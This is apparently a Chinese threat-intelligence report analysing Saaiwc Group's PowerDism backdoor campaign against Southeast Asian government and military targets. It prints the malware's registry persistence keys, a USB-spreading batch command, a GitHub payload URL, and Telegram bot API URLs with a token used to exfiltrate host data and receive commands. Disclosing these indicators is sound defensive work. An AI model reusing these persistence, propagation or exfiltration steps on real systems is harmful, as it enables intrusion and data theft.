点击蓝字关注我们
一
事件概述
2022年11月,安恒信息猎影实验室在威胁狩猎中持续追踪到针对东南亚地区的攻击活动,活动疑似针对菲律宾、柬埔寨、越南地区的军事、财政部门。
攻击活动主要以ISO文件为初始恶意负载,运行后在本机注册表添加Powershell指令,最后加载Powershell后门PowerDism窃取本机信息并执行任意指令。根据样本中的互斥体名称,我们将该组织命名为:Saaiwc Group,内部编号:APT-LY-1005。相关攻击流程如下图:
经溯源关联分析,我们对该威胁组织的画像分析如下:
组织名称 | Saaiwc Group(猎影实验室内部编号:APT-LY-1005) |
组织归属 | 疑似东南亚地区 |
目标地域 | 东南亚地区国家(菲律宾、柬埔寨、越南) |
目标行业 | 政府、军事 |
首次出现 | 2022年5月 |
使用工具 | PowerDism后门 |
漏洞利用 | CVE-2017-0199 |
此次攻击活动大约发生在10月下旬到11月底,我们捕获到的样本信息如下表:
文件名 | Hash | 其他信息 |
Updates on AJEX DAGITPA 2022 on 200900 Oct 22.pdf.iso | edcd5ff1c2af9451405d430052c60660 | 2022-10-19上传针对菲律宾陆军司令部 |
IPMIS CASCADING CY 202220221003_18510684.pdf(3).iso | a6e085c099d681a71b937631a5e88c06 | 2022-10-19上传针对菲律宾5ID陆军 |
MEF_Password_Policy_V001.iso | c6abce3f12c14b7804a2532a3f5199b7 | 2022-11-25上传针对柬埔寨经济和财政部 |
相关文件运行后释放的诱饵文件如下:
诱饵文件1:菲律宾军队 参谋长助理办公室下发的会议通知
诱饵文件2:菲律宾5ID军队 2022年度绩效管理培训通知
诱饵文件3:柬埔寨经济和财政部关于员工密码的管理要求
二
执行过程
攻击活动中的恶意样本执行流程如下:
1
Steg1 解密Shellcode
2
Steg2 Shellcode功能
Shellcode执行后,将执行以下操作
1
创建互斥体"v653Bmua-53JCY7Vq-tgSAaiwC-SSq3D4b6",防止恶意负载重复运行
2
运行诱饵文件
3
设置环境变量,通过添加注册表项HKCU\Environment\UserInitMprLogonScript执行Windows自动登录脚本,实现持久化驻留。
4
同时设置GUID项,存放与Telegram通信的APIKEY:5621584862:AAGG6WcTvFu7ADpnMT42PqwOoKfTqMDQKkQ以及CHATID:5028607068
5
设置文件扩展名.abcd
6
在注册表HKEY_CURRENT_USER\Software\Classes\abcdfile\shell\open\command路径下写入Powershell指令以及加密数据
3
Steg3 解密Powershell指令
对注册表中Powershell指令解密如下
对Powershell指令去混淆之后
对Base64编码后的Powershell指令进一步解码解压,得到最后阶段Powershell后门PowerDism
4
Steg4 PowerDism后门分析
该后门运行后将注册WMI事件,用于实现USB驱动连接时触发以下恶意行为
1
获取可移动磁盘
2
尝试解压%Temp%目录下的xxx.zip文件到%Temp%目录
3
若文件不存在,则下载hxxps://raw.githubusercontent.com/efimovah/abcd/main/xxx.gif
4
将解压后的文件夹复制并重命名到移动磁盘\dism目录
5
创建BAT文件system.bat,写入指令"@echo off cd %cd%dism start dism.exe exit"用于启动xxx.gif中的dism.exe文件
6
将\dism目录下的所有文件属性设置为系统文件属性+隐藏文件属性
7
创建LNK文件用于启动system.bat
接着获取本机计算机名、用户名、IP归属国家-地区、出口IP地址、本地IP地址、计算机产品名、磁盘设备名、操作系统版本、反病毒产品等
发送至Telagram-API接口api.telegram.org/bot5621584862:AAGG6WcTvFu7ADpnMT42PqwOoKfTqMDQKkQ/sendMessage?chat_id=5028607068&text={cn : (whoami) : (ip.countryCode)-(ip.region) : (ip.query) : ip_local : model : hd : os : type : av :}
凭据发送后,C2将为当前感染主机分配新的标识
从Telagram-API接口api.telegram.org/bot5621584862:AAGG6WcTvFu7ADpnMT42PqwOoKfTqMDQKkQ/getUpdates获取后续指令执行并回传至Telagram-API接口
api.telegram.org/bot5621584862:AAGG6WcTvFu7ADpnMT42PqwOoKfTqMDQKkQ/sendMessage?chat_id=5028607068&text=$info
关于指令分发的部分name和task内容如下,我们发现C2将对特定用户执行特定指令。例如,针对DESKTOP-GJ77TNV用户,恶意负载将检索主机OneDrive目录下的文件信息上传至C2
三
传播途径
PowerDism后门可通过移动磁盘传播。当检测到移动磁盘存在时,将从Github(https://github.com/efimovah/abcd)获取加密负载,解密并移动至移动磁盘目录,而后创建BAT、LNK文件,使恶意负载随目标机器开机自启。
恶意文件启动后利用DLL劫持加载目录中DismCore.dll文件。随后解密同目录下的Dism.sys文件,并在内存中加载PowerDism后门以窃取移动磁盘信息。
加载后的Shellcode与Steg2相同,均为增改注册表键值以植入Powershell指令。Powershell指令功能与上述几乎一致。
四
溯源关联
除以上样本外,我们还观察到攻击者于2022年5月针对越南投放的攻击样本。
文件名 | 文件名 | 其他信息 |
Application-Form-YSEALI-Academic-Fellowship.iso | f02a96b84231da7626399ff1ca6fb33f | 2022-05-24上传针对越南YSEALI东南亚青年领袖计划 |
诱饵文件4:东南亚青年领袖计划申请表
与10-11月攻击样本不同的是,攻击者5月所用的攻击链为CVE-2017-0199漏洞利用加载带有恶意宏代码的远程模板文件。
宏代码将读取UserForm窗体内容,将Powershell指令写入注册表中,后续恶意行为与上述一致。
此外,攻击者的Github更新状态,主要集中在上半年3-5月,与下半年10-11月期间,与我们发现的两次攻击活动时间基本吻合。
进一步对攻击者提交至Github时间进行分析,我们发现攻击者处于UTC+7时区。将相关时间换算成UTC+7时区后的统计图表如下:
UTC+7时区为中南半岛标准时间,攻击者疑似来自东南亚地区。
五
防范建议
目前安全数据部已具备相关威胁检测能力,对应产品已完成IoC情报的集成:
●安恒产品已集成能力:
针对该事件中的最新IoC情报,以下产品的版本可自动完成更新,若无法自动更新则请联系技术人员手动更新:
(1)AiLPHA分析平台V5.0.0及以上版本
(2)AiNTA设备V1.2.2及以上版本
(3)AXDR平台V2.0.3及以上版本
(4)APT设备V2.0.67及以上版本
(5)EDR产品V2.0.17及以上版本
● 安恒云沙盒已集成了该事件中的样本特征:
用户可通过云沙盒:
https://ti.dbappsecurity.com.cn/sandbox,对可疑文件进行免费分析,并下载分析报告。
安恒安全数据部, 下设猎影实验室、零壹实验室、析安实验室和回声实验室,团队以数据分析与技术研究为核心,致力于数据驱动安全创造用户价值。
猎影实验室
高级威胁研究团队,专注于APT攻击发现、分析、检测、溯源、防御等研究,以及积累了海量的IoC情报数据。
网络安全研究宅基地
扫码关注我们,一群技术宅